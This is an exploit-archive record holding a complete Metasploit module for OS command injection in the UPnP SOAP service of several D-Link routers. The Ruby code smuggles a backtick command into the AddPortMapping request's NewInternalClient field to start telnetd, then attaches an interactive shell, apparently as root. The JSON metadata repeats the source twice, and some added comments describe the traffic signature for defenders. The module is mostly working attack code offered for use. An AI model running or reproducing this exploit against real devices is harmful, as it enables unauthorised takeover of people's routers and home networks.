ID 1337DAY-ID-21237 Type zdt Reporter metasploit Modified 2013-09-17T00:00:00
Description
Various D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. This Metasploit module has been tested successfully on DIR-300, DIR-600, DIR-645, DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices may be affected.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  # Exploit module for an OS command injection in the UPnP SOAP interface of
  # several D-Link routers. The value of <NewInternalClient> in a
  # WANIPConnection AddPortMapping request reaches a shell unsanitised; the
  # module uses it to start telnetd on a random port and then attaches the
  # cmd/unix/interact payload to that telnet socket.
  #
  # Defensive notes (what the traffic and artifacts look like, per the code
  # below): a POST to /soap.cgi?service=WANIPConn1 with a
  # "...WANIPConnection:1#AddPortMapping" SOAPAction whose <NewInternalClient>
  # contains backticks, followed by a DeletePortMapping for the same external
  # port, and afterwards an unexpected telnetd listening on a high TCP port.
  # Devices that do not expose the UPnP SOAP port (default 49152 below) are not
  # reachable by this module.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # NOTE(review): nothing in this file registers a dropped file for cleanup,
  # so the FileDropper mixin appears unused here.
  include Msf::Exploit::FileDropper

  # Module metadata and options.
  #
  # The payload is pinned to an interactive command payload that reuses an
  # already-connected socket ('ConnectionType' => 'find'), so the framework
  # does not start a separate bind/reverse handler; #exploit supplies the
  # socket via handler(sock).
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'D-Link Devices UPnP SOAP Telnetd Command Execution',
      'Description' => %q{
        Various D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
        interface. This module has been tested successfully on DIR-300, DIR-600, DIR-645,
        DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices
        may be affected.
      },
      'Author' =>
        [
          # NOTE(review): the address below was mangled by the page extraction
          # ("[email protected]"); the archived copy of this file embedded in the
          # same record reads devnull@s3cur1ty.de. Left untouched here.
          'Michael Messner <[email protected]>', # Vulnerability discovery and Metasploit module
          'juan vazquez' # minor help with msf module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'OSVDB', '94924' ],
          [ 'BID', '61005' ],
          [ 'EDB', '26664' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-020' ]
        ],
      'DisclosureDate' => 'Jul 05 2013',
      # 'Privileged' => true together with the "# " prompt expected by
      # #negotiate_telnet suggests the UPnP daemon runs as root — not verified
      # by anything in this file.
      'Privileged' => true,
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Payload' =>
        {
          'Compat' => {
            'PayloadType' => 'cmd_interact',
            'ConnectionType' => 'find',
          },
        },
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
      'Targets' =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget' => 0
    ))

    register_options(
      [
        Opt::RPORT(49152) # port of the UPnP SOAP web interface
      ], self.class)

    # Both timeouts are read back through #tel_timeout / #banner_timeout.
    register_advanced_options(
      [
        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
      ], self.class)
  end

  # Per-read timeout (seconds) for the telnet socket; falls back to 10 when
  # the option is unset.
  #
  # @return [Integer]
  def tel_timeout
    (datastore['TelnetTimeout'] || 10).to_i
  end

  # Overall time (seconds) #negotiate_telnet waits for the shell prompt;
  # falls back to 25 when the option is unset.
  #
  # @return [Integer]
  def banner_timeout
    (datastore['TelnetBannerTimeout'] || 25).to_i
  end

  # Runs the full chain: inject the telnetd command via AddPortMapping, remove
  # the mapping again via DeletePortMapping, connect to the new telnet port,
  # wait for a shell prompt, and hand the socket to the payload handler.
  #
  # Every step that does not look like success ends in fail_with, which does
  # not return. The Server header check on both SOAP responses is the only
  # success signal the module has; an HTTP 200 alone is not trusted.
  def exploit
    @new_portmapping_descr = rand_text_alpha(8)
    # rand(65535) yields 0..65534; all three values are interpolated into the
    # SOAP body by #request / into the telnetd command line below.
    @new_external_port = rand(65535)
    @new_internal_port = rand(65535)
    telnetport = rand(65535)

    vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")

    cmd = "telnetd -p #{telnetport}"
    type = "add"
    res = request(cmd, type)
    # The response must come from a D-Link UPnP stack ("Linux, UPnP/1.0, DIR...");
    # the backslash escapes in the pattern are literal ',' and ' ' characters.
    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
    end
    # Cleanup request; #request ignores cmd on this path, so the command is
    # not sent a second time.
    type = "delete"
    res = request(cmd, type)
    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
    end

    print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })

    # NOTE(review): Rex::Socket.create_tcp is believed to raise a
    # Rex::ConnectionError subclass when the connect fails rather than return
    # nil, in which case this guard never fires and the framework reports the
    # exception instead — confirm against the Rex version in use.
    if sock.nil?
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
    end

    print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
    prompt = negotiate_telnet(sock)
    if prompt.nil?
      # Close the socket before bailing out; fail_with does not return.
      sock.close
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
    else
      print_good("#{rhost}:#{rport} - Telnet session successfully established...")
    end

    # The 'find' connection type means the payload takes over this socket.
    handler(sock)
  end

  # Builds and sends one SOAP request to /soap.cgi?service=WANIPConn1.
  #
  # @param cmd [String] shell command. Only used when type == "add", where it
  #   is placed inside backticks in <NewInternalClient> — the injection point.
  #   It is not embedded anywhere in the delete request.
  # @param type [String] "add" selects AddPortMapping; any other value selects
  #   DeletePortMapping for the external port chosen in #exploit.
  # @return the object returned by send_request_cgi (nil when no response was
  #   received); callers inspect .code and .headers['Server'].
  #
  # A ::Rex::ConnectionError is turned into fail_with(Unreachable), which
  # does not return. The body is built by string concatenation with no XML
  # escaping, so cmd must not contain characters that would break the markup.
  def request(cmd, type)
    uri = '/soap.cgi'

    data_cmd = "<?xml version=\"1.0\"?>"
    data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
    data_cmd << "<SOAP-ENV:Body>"

    if type == "add"
      vprint_status("#{rhost}:#{rport} - adding portmapping")

      soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"

      data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
      data_cmd << "<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>"
      data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
      # Vulnerable field: the device evaluates the backtick expression.
      data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
      data_cmd << "<NewEnabled>1</NewEnabled>"
      data_cmd << "<NewExternalPort>#{@new_external_port}</NewExternalPort>"
      data_cmd << "<NewRemoteHost></NewRemoteHost>"
      data_cmd << "<NewProtocol>TCP</NewProtocol>"
      data_cmd << "<NewInternalPort>#{@new_internal_port}</NewInternalPort>"
      data_cmd << "</m:AddPortMapping>"
    else
      # Remove the mapping again; otherwise a repeat run against the same
      # device is not possible.
      vprint_status("#{rhost}:#{rport} - deleting portmapping")
      soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"

      data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
      data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
      data_cmd << "</m:DeletePortMapping>"
    end

    data_cmd << "</SOAP-ENV:Body>"
    data_cmd << "</SOAP-ENV:Envelope>"

    begin
      res = send_request_cgi({
        'uri' => uri,
        'vars_get' => {
          'service' => 'WANIPConn1'
        },
        'ctype' => "text/xml",
        'method' => 'POST',
        'headers' => {
          'SOAPAction' => soapaction,
        },
        'data' => data_cmd
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
    end
  end

  # Waits for a shell prompt on the telnet socket.
  #
  # Despite the name, no telnet option negotiation is performed: the method
  # only reads chunks and looks for one ending in "# " (0x23 0x20).
  #
  # @param sock [Rex::Socket] connected TCP socket from #exploit
  # @return [true, nil] true once the prompt is seen; nil when a read returns
  #   nothing (closed/idle socket) or when banner_timeout expires overall.
  #   Each individual read waits at most tel_timeout seconds.
  #
  # NOTE(review): `$` in a Ruby regexp also matches before an embedded
  # newline, so "# " at the end of any line in the chunk satisfies the check,
  # not only the end of the buffer.
  def negotiate_telnet(sock)
    begin
      Timeout.timeout(banner_timeout) do
        while(true)
          data = sock.get_once(-1, tel_timeout)
          return nil if not data or data.length == 0
          if data =~ /\x23\x20$/
            return true
          end
        end
      end
    rescue ::Timeout::Error
      return nil
    end
  end
end
{"published": "2013-09-17T00:00:00", "id": "1337DAY-ID-21237", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T01:31:10", "bulletin": {"published": "2013-09-17T00:00:00", "id": "1337DAY-ID-21237", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.1, "modified": "2016-04-19T01:31:10"}}, "hash": "9de592a4b8e67f9f1d80fe234d58e2d6604410b0b0e30c82fe868c36fb0b0f53", "description": "Various D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. This Metasploit module has been tested successfully on DIR-300, DIR-600, DIR-645, DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices may be affected.", "type": "zdt", "lastseen": "2016-04-19T01:31:10", "edition": 1, "title": "D-Link Devices UPnP SOAP Telnetd Command Execution", "href": "http://0day.today/exploit/description/21237", "modified": "2013-09-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/21237", "references": [], "reporter": "metasploit", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'D-Link Devices UPnP SOAP Telnetd Command Execution',\r\n 'Description' => %q{\r\n Various D-Link Routers are vulnerable to OS command injection in the UPnP SOAP\r\n interface. This module has been tested successfully on DIR-300, DIR-600, DIR-645,\r\n DIR-845 and DIR-865. 
According to the vulnerability discoverer, more D-Link devices\r\n may be affected.\r\n },\r\n 'Author' =>\r\n [\r\n 'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module\r\n 'juan vazquez' # minor help with msf module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'OSVDB', '94924' ],\r\n [ 'BID', '61005' ],\r\n [ 'EDB', '26664' ],\r\n [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-020' ]\r\n ],\r\n 'DisclosureDate' => 'Jul 05 2013',\r\n 'Privileged' => true,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' =>\r\n {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd_interact',\r\n 'ConnectionType' => 'find',\r\n },\r\n },\r\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', { } ],\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(49152) #port of UPnP SOAP webinterface\r\n ], self.class)\r\n\r\n register_advanced_options(\r\n [\r\n OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),\r\n OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])\r\n ], self.class)\r\n end\r\n\r\n def tel_timeout\r\n (datastore['TelnetTimeout'] || 10).to_i\r\n end\r\n\r\n def banner_timeout\r\n (datastore['TelnetBannerTimeout'] || 25).to_i\r\n end\r\n\r\n def exploit\r\n @new_portmapping_descr = rand_text_alpha(8)\r\n @new_external_port = rand(65535)\r\n @new_internal_port = rand(65535)\r\n telnetport = rand(65535)\r\n\r\n vprint_status(\"#{rhost}:#{rport} - Telnetport: #{telnetport}\")\r\n\r\n cmd = \"telnetd -p #{telnetport}\"\r\n type = \"add\"\r\n res = request(cmd, type)\r\n if (!res or res.code != 200 or res.headers['Server'].nil? 
or res.headers['Server'] !~ /Linux\\,\\ UPnP\\/1.0,\\ DIR/)\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Unable to execute payload\")\r\n end\r\n type = \"delete\"\r\n res = request(cmd, type)\r\n if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\\,\\ UPnP\\/1.0,\\ DIR/)\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Unable to execute payload\")\r\n end\r\n\r\n print_status(\"#{rhost}:#{rport} - Trying to establish a telnet connection...\")\r\n sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })\r\n\r\n if sock.nil?\r\n fail_with(Exploit::Failure::Unreachable, \"#{rhost}:#{rport} - Backdoor service has not been spawned!!!\")\r\n end\r\n\r\n print_status(\"#{rhost}:#{rport} - Trying to establish a telnet session...\")\r\n prompt = negotiate_telnet(sock)\r\n if prompt.nil?\r\n sock.close\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Unable to establish a telnet session\")\r\n else\r\n print_good(\"#{rhost}:#{rport} - Telnet session successfully established...\")\r\n end\r\n\r\n handler(sock)\r\n end\r\n\r\n def request(cmd, type)\r\n\r\n uri = '/soap.cgi'\r\n\r\n data_cmd = \"<?xml version=\\\"1.0\\\"?>\"\r\n data_cmd << \"<SOAP-ENV:Envelope xmlns:SOAP-ENV=\\\"http://schemas.xmlsoap.org/soap/envelope\\\" SOAP-ENV:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\">\"\r\n data_cmd << \"<SOAP-ENV:Body>\"\r\n\r\n if type == \"add\"\r\n vprint_status(\"#{rhost}:#{rport} - adding portmapping\")\r\n\r\n soapaction = \"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"\r\n\r\n data_cmd << \"<m:AddPortMapping xmlns:m=\\\"urn:schemas-upnp-org:service:WANIPConnection:1\\\">\"\r\n data_cmd << \"<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>\"\r\n data_cmd << \"<NewLeaseDuration></NewLeaseDuration>\"\r\n data_cmd << \"<NewInternalClient>`#{cmd}`</NewInternalClient>\"\r\n data_cmd << 
\"<NewEnabled>1</NewEnabled>\"\r\n data_cmd << \"<NewExternalPort>#{@new_external_port}</NewExternalPort>\"\r\n data_cmd << \"<NewRemoteHost></NewRemoteHost>\"\r\n data_cmd << \"<NewProtocol>TCP</NewProtocol>\"\r\n data_cmd << \"<NewInternalPort>#{@new_internal_port}</NewInternalPort>\"\r\n data_cmd << \"</m:AddPortMapping>\"\r\n else\r\n #we should clean it up ... otherwise we are not able to exploit it multiple times\r\n vprint_status(\"#{rhost}:#{rport} - deleting portmapping\")\r\n soapaction = \"urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping\"\r\n\r\n data_cmd << \"<m:DeletePortMapping xmlns:m=\\\"urn:schemas-upnp-org:service:WANIPConnection:1\\\">\"\r\n data_cmd << \"<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>\"\r\n data_cmd << \"</m:DeletePortMapping>\"\r\n end\r\n\r\n data_cmd << \"</SOAP-ENV:Body>\"\r\n data_cmd << \"</SOAP-ENV:Envelope>\"\r\n\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'vars_get' => {\r\n 'service' => 'WANIPConn1'\r\n },\r\n 'ctype' => \"text/xml\",\r\n 'method' => 'POST',\r\n 'headers' => {\r\n 'SOAPAction' => soapaction,\r\n },\r\n 'data' => data_cmd\r\n })\r\n return res\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{rhost}:#{rport} - Failed to connect to the web server\")\r\n end\r\n end\r\n\r\n def negotiate_telnet(sock)\r\n begin\r\n Timeout.timeout(banner_timeout) do\r\n while(true)\r\n data = sock.get_once(-1, tel_timeout)\r\n return nil if not data or data.length == 0\r\n if data =~ /\\x23\\x20$/\r\n return true\r\n end\r\n end\r\n end\r\n rescue ::Timeout::Error\r\n return nil\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", 
"key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "002c9e0db9b2fff76a87cd0a426e4d86", "key": "published"}, {"hash": "548f59ce8914478e984445a7e84be349", "key": "sourceData"}, {"hash": "51b0debb46dce75895deec2dbe98fbc8", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "c998f47cfab3fd7f2cfb63e6f189fb21", "key": "title"}, {"hash": "0aea3add77f12492638724f4d7b4efde", "key": "href"}, {"hash": "4f3220e4d9dc865db8a0ccba455c08f9", "key": "sourceHref"}, {"hash": "002c9e0db9b2fff76a87cd0a426e4d86", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Various D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. This Metasploit module has been tested successfully on DIR-300, DIR-600, DIR-645, DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices may be affected.", "hash": "6e19b9068a321d11664deb8291393160b2a283581bcfdce88c739fce0beaa91d", "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2018-02-05T03:14:46"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-26664", "1337DAY-ID-865"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:21237"]}], "modified": "2018-02-05T03:14:46"}, "vulnersScore": 1.0}, "type": "zdt", "lastseen": "2018-02-05T03:14:46", "edition": 2, "title": "D-Link Devices UPnP SOAP Telnetd Command Execution", "href": "https://0day.today/exploit/description/21237", "modified": "2013-09-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "https://0day.today/exploit/21237", "references": [], "reporter": "metasploit", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'D-Link Devices UPnP SOAP Telnetd Command Execution',\r\n 'Description' => %q{\r\n Various D-Link Routers are vulnerable to OS command injection in the UPnP SOAP\r\n interface. This module has been tested successfully on DIR-300, DIR-600, DIR-645,\r\n DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices\r\n may be affected.\r\n },\r\n 'Author' =>\r\n [\r\n 'Michael Messner <[email\u00a0protected]>', # Vulnerability discovery and Metasploit module\r\n 'juan vazquez' # minor help with msf module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'OSVDB', '94924' ],\r\n [ 'BID', '61005' ],\r\n [ 'EDB', '26664' ],\r\n [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-020' ]\r\n ],\r\n 'DisclosureDate' => 'Jul 05 2013',\r\n 'Privileged' => true,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' =>\r\n {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd_interact',\r\n 'ConnectionType' => 'find',\r\n },\r\n },\r\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', { } ],\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(49152) #port of UPnP SOAP webinterface\r\n ], self.class)\r\n\r\n register_advanced_options(\r\n [\r\n OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),\r\n OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])\r\n ], self.class)\r\n end\r\n\r\n def tel_timeout\r\n (datastore['TelnetTimeout'] || 10).to_i\r\n end\r\n\r\n def 
banner_timeout\r\n (datastore['TelnetBannerTimeout'] || 25).to_i\r\n end\r\n\r\n def exploit\r\n @new_portmapping_descr = rand_text_alpha(8)\r\n @new_external_port = rand(65535)\r\n @new_internal_port = rand(65535)\r\n telnetport = rand(65535)\r\n\r\n vprint_status(\"#{rhost}:#{rport} - Telnetport: #{telnetport}\")\r\n\r\n cmd = \"telnetd -p #{telnetport}\"\r\n type = \"add\"\r\n res = request(cmd, type)\r\n if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\\,\\ UPnP\\/1.0,\\ DIR/)\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Unable to execute payload\")\r\n end\r\n type = \"delete\"\r\n res = request(cmd, type)\r\n if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\\,\\ UPnP\\/1.0,\\ DIR/)\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Unable to execute payload\")\r\n end\r\n\r\n print_status(\"#{rhost}:#{rport} - Trying to establish a telnet connection...\")\r\n sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })\r\n\r\n if sock.nil?\r\n fail_with(Exploit::Failure::Unreachable, \"#{rhost}:#{rport} - Backdoor service has not been spawned!!!\")\r\n end\r\n\r\n print_status(\"#{rhost}:#{rport} - Trying to establish a telnet session...\")\r\n prompt = negotiate_telnet(sock)\r\n if prompt.nil?\r\n sock.close\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Unable to establish a telnet session\")\r\n else\r\n print_good(\"#{rhost}:#{rport} - Telnet session successfully established...\")\r\n end\r\n\r\n handler(sock)\r\n end\r\n\r\n def request(cmd, type)\r\n\r\n uri = '/soap.cgi'\r\n\r\n data_cmd = \"<?xml version=\\\"1.0\\\"?>\"\r\n data_cmd << \"<SOAP-ENV:Envelope xmlns:SOAP-ENV=\\\"http://schemas.xmlsoap.org/soap/envelope\\\" SOAP-ENV:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\">\"\r\n data_cmd << \"<SOAP-ENV:Body>\"\r\n\r\n if type == \"add\"\r\n vprint_status(\"#{rhost}:#{rport} - 
adding portmapping\")\r\n\r\n soapaction = \"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"\r\n\r\n data_cmd << \"<m:AddPortMapping xmlns:m=\\\"urn:schemas-upnp-org:service:WANIPConnection:1\\\">\"\r\n data_cmd << \"<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>\"\r\n data_cmd << \"<NewLeaseDuration></NewLeaseDuration>\"\r\n data_cmd << \"<NewInternalClient>`#{cmd}`</NewInternalClient>\"\r\n data_cmd << \"<NewEnabled>1</NewEnabled>\"\r\n data_cmd << \"<NewExternalPort>#{@new_external_port}</NewExternalPort>\"\r\n data_cmd << \"<NewRemoteHost></NewRemoteHost>\"\r\n data_cmd << \"<NewProtocol>TCP</NewProtocol>\"\r\n data_cmd << \"<NewInternalPort>#{@new_internal_port}</NewInternalPort>\"\r\n data_cmd << \"</m:AddPortMapping>\"\r\n else\r\n #we should clean it up ... otherwise we are not able to exploit it multiple times\r\n vprint_status(\"#{rhost}:#{rport} - deleting portmapping\")\r\n soapaction = \"urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping\"\r\n\r\n data_cmd << \"<m:DeletePortMapping xmlns:m=\\\"urn:schemas-upnp-org:service:WANIPConnection:1\\\">\"\r\n data_cmd << \"<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>\"\r\n data_cmd << \"</m:DeletePortMapping>\"\r\n end\r\n\r\n data_cmd << \"</SOAP-ENV:Body>\"\r\n data_cmd << \"</SOAP-ENV:Envelope>\"\r\n\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'vars_get' => {\r\n 'service' => 'WANIPConn1'\r\n },\r\n 'ctype' => \"text/xml\",\r\n 'method' => 'POST',\r\n 'headers' => {\r\n 'SOAPAction' => soapaction,\r\n },\r\n 'data' => data_cmd\r\n })\r\n return res\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{rhost}:#{rport} - Failed to connect to the web server\")\r\n end\r\n end\r\n\r\n def negotiate_telnet(sock)\r\n begin\r\n Timeout.timeout(banner_timeout) do\r\n while(true)\r\n data = sock.get_once(-1, tel_timeout)\r\n return nil 
if not data or data.length == 0\r\n if data =~ /\\x23\\x20$/\r\n return true\r\n end\r\n end\r\n end\r\n rescue ::Timeout::Error\r\n return nil\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-02-05] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "51b0debb46dce75895deec2dbe98fbc8", "key": "description"}, {"hash": "7b0bfcf55b57223fb4b12bdcd5fa5464", "key": "href"}, {"hash": "002c9e0db9b2fff76a87cd0a426e4d86", "key": "modified"}, {"hash": "002c9e0db9b2fff76a87cd0a426e4d86", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "cc64b6ce5cd90b774f74cc0c23e48f3c", "key": "sourceData"}, {"hash": "f3bd10000c3dedcf7f88e2e2449e7497", "key": "sourceHref"}, {"hash": "c998f47cfab3fd7f2cfb63e6f189fb21", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}